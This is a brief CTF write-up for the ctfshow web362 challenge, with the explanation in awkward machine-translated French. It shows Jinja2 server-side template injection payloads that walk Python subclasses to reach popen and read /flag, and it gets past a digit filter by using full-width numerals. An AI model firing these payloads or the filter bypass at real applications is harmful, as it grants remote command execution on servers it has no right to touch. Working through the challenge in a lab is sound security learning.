当前位置：网站首页>Ctfshow - web362 (ssti)

Ctfshow - web362 (ssti)

2022-04-23 18:29:00 【M0 62094846】

?name={
   {"".__class__.__bases__[0].__subclasses__()}}

C'est normal jusqu'ici.

De12 Ça ne marchera plus.

Il y a un problème avec les chiffres ,Regarde.wp Contournement avec un nombre plein angle au lieu d'un nombre normal

?name={
   {"".__class__.__bases__[0].__subclasses__()[１３２]}}

Il devrait alors être possible de le faire normalement

?name={
   {"".__class__.__bases__[0].__subclasses__()[１３２].__init__.__globals__['popen']('cat /flag').read()}}

版权声明
本文为[M0 62094846]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/04/202204231829007951.html